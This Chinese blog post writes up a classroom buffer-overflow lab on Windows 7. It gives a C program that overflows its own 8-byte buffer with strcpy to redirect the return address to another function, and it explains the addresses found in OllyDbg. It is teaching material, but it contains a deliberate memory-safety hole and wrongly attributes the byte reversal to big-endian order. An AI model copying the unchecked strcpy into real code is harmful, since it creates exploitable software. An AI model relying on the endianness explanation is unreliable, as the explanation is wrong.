缓冲区溢出工具实践,华工信息安全实验

参考博文:http://ftcl.hit.edu.cn/main/?p=585

原文代码基本都漏掉转移符号"\",还有个不明所以的amp,应该是html代码复制时候带的垃圾

如果需要代码可以复制我下面的代码

您重新编译的代码大概跟我的代码,在虚拟地址空间中的地址是不一样的。也就是说应该不会是00401344


编码平台 :

OSWindows7

IDECodeblocks + minGW

语言和库:C

程序代码:

#include <stdio.h>;

void haha()

{

    printf("\nOK!success");

}

void fun(const char* input)

{

       char buf[8];

       printf("Addr of buf = %p\n", &buf);

       strcpy(buf,input);

       printf("%s\n", buf);

}

int main(int argc, char* argv[])

{

        printf("Address of foo=%p\n",fun);

        printf("Address of haha=%p\n",haha);

        char ss[]="ABCDABCDABCDABCDABCD\x44\x13\x40\x00";

        fun(ss);

        return 0;

}

理由解释如上图,图片是用著名反汇编程序OllyDbg反汇编得出的。

如图分析,所以得到缓冲区写入数据应该要是

char ss[]="ABCDABCDABCDABCDABCD\x44\x13\x40\x00";

其中44 13 40 00是因为大端,所以按字节反序。

00134000haha函数的开头。

不过有个小问题是,溢出攻击成功后,Windows会发现,大概是因为haha函数最后是retn的汇编代码,但是堆栈中相对应的位置不是一个返回地址(可能是垃圾数据等非可执行汇编代码)。由于是选修信息安全且没有系统地学习汇编语言,也就没有继续深究怎样构造缓冲区可以正常结束程序。

根据经验,编译好的文件在别的电脑上运行时候的非动态分配的地址都是固定的,也就是说这个实验结果应该是可以在其他机子上复原的。不过用代码在别的机子重新编译,也许就不行了,所以这次实验顺便连带应用程序也上交了。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值